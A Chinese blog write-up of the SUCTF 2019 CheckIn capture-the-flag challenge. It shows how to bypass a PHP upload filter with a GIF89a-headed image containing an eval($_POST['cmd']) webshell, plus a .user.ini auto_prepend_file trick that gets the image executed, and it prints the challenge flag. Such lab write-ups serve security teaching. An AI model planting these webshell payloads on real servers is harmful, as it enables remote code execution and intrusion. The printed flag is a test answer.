首页 > 其他分享 >[SUCTF 2019]CheckIn 1

[SUCTF 2019]CheckIn 1

时间:2024-11-12 23:30:31浏览次数:1  
标签:SUCTF index string CheckIn jpg 2019 php 上传

[SUCTF 2019]CheckIn 1

打开实例,发现文件上传页面

image-20241112225509181

根据题目提示,查看网页源码

image-20241112225536481

这边提示系统会创建一个访问者的 IP 地址的 MD5 哈希值作为目录,并在其后拼接index.php

POST上传的upload参数,文件名不能为空,不能过大,不能包含phhtacess,不能有<?,并且限制上传类型为image,如果满足以上条件,则输出文件位置和目录位置。

分析:

根据信息,已经能确定上传php类型不可行,包括php3、phtml等文件混淆,且包含文件类型限制,并且内容过滤了<?,所以决定采用图片马+javascript+幻术头GIF89a的形式上传图片马

payload:

------WebKitFormBoundaryi81FjE7IXd1HzMLZ
Content-Disposition: form-data; name="fileUpload"; filename="abc.jpg"
Content-Type: image/png

GIF89a
<script language='php'>eval($_POST['cmd']);</script>
------WebKitFormBoundaryi81FjE7IXd1HzMLZ
Content-Disposition: form-data; name="upload"

提交
------WebKitFormBoundaryi81FjE7IXd1HzMLZ--

image-20241112233112695

上传成功,并给出了文件回显,(这个abc是做测试的时候传的)

Your dir uploads/ec53bc853c0c94f2bf546edd1a265425 <br>Your files : <br>array(5) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(7) "aaa.jpg"
  [3]=>
  string(7) "abc.jpg"
  [4]=>
  string(9) "index.php"
}

所以根据代码提示,图片马地址为

uploads/ec53bc853c0c94f2bf546edd1a265425/index.php

访问not found,存在解析问题

图片马成功了,接下来就是解析问题,根据提示.htaccess被禁用,所以根据源码提示决定采用.user.ini配置进行解析,这边一样得加上幻术头

payload

GIF89a
auto_prepend_file=aaa.jpg

image-20241112231822226

上传成功,访问uploads/ec53bc853c0c94f2bf546edd1a265425/index.php,解析成功

image-20241112233312009

Hacker barPOST传递参数,参数为cmd,也就是一句话木马的密码

image-20241112233645827

找到flag

flag{2fd51ec6-e0e4-432c-8569-cc524f4b0271} 

标签:SUCTF,index,string,CheckIn,jpg,2019,php,上传
From: https://www.cnblogs.com/tazmi/p/18542872

相关文章

  • [极客大挑战 2019]Knife
    打开页面说菜刀丢了,我们知道菜刀,也叫中国菜刀,是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。只要往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取......
  • [极客大挑战 2019]Upload
    直接上传shell.php,发现提示不是图片,这时先修改后缀名或者Content-Type数。我们使用burpsuite进行操作抓包后发送到repeater,直接修改后缀名不行,看来是通过Content-Type属性来判断是否为图片的,将Content-Type修改为image/jpeg,回显not!php!将文件后缀名修改为phtml,回显包含了<?......
  • [极客大挑战 2019]Http
    打开页面如下:主页没有什么信息,直接查看网页源代码,查找href看看有没有链接,发现Secret.php访问得到,Itdoesn'tcomefrom'https://Sycsecret.buuoj.cn',我们知道这需要修改referer。使用burpsuite抓包抓包后,转发到repeater,添加referer属性,send访问,发现要求使用'Syclover'浏览......
  • P8680 [蓝桥杯 2019 省 B] 特别数的和 java
    题目描述小明对数位中含有 22、00、11、99 的数字很感兴趣(不包括前导 00),在 11 到 4040 中这样的数包括 11、22、99、1010 至 3232、3939 和 4040,共 2828 个,他们的和是 574574。请问,在 11 到 nn 中,所有这样的数的和是多少?输入格式输入一行包含一个整数 ......
  • ansible执行playbook报Host Key checking
    报错信息:(fastapi-ansible)root@WEB:/data/fastapi-ansible/project#ansible-playbook-ihostsping.yamlPLAY[PingTestPlaybook]*********************************************************************************************************************TASK[Pi......
  • [buuctf]/[极客大挑战 2019]BabySQL 1
    页面上提示输入会被严格过滤,这里我们就要留意一下,经常被过滤掉的几个词首先测试闭合方式。http://cec6e5ef-7407-453b-9993-609691edcfb4.node5.buuoj.cn:81/check.php?username=1'&password=1这里单引号出现报错,猜测闭合方式是单引号。下一步,进步确认闭合方式,正常步骤应......
  • ciscn_2019_n_1
    题目链接:ciscn_2019_n_1。下载附件后,使用IDA打开程序,并进行反编译,定位到main函数,如下。int__fastcallmain(intargc,constchar**argv,constchar**envp){setvbuf(_bss_start,0LL,2,0LL);setvbuf(stdin,0LL,2,0LL);func();return0;}func函数......
  • [极客大挑战 2019]Secret
    首页什么都没有,查看网页源码,发现有一个链接,提示found除去view-source访问,得到以下页面,点击secret直接查阅结束,没回显flag,依旧在卖关子。使用burpsuite抓包获取返回的源码,找到注释中有个文件secr3t.php访问secr3t.php得到代码里说flag在flag.php里,直接访问flag.php,发现......
  • [极客大挑战 2019]LoveSQL
    打开是一个登录界面使用admin'or1#万能密码绕过密码登录再使用admin'orderby3#找回显的列数,结果为3,再使用a'unionselect1,2,3#找回显的列,结果为2,3后面就是常规的union注入流程#找数据库和表名a'unionselect1,database(),group_concat(table_name)frominfor......
  • [强网杯 2019]随便注
    输入1',发现报错,且闭合符号为单引号那么我们可以尝试报错注入,先用orderby确认回显列数。这里回显列数为2用union确认回显位置,1unionselect1,2,发现这些字符被过滤了,尝试了大小写也不行,直接猜吧。这里可以用报错注入,1'and(extractvalue(1,concat(0x7e,database(),0x7e)))......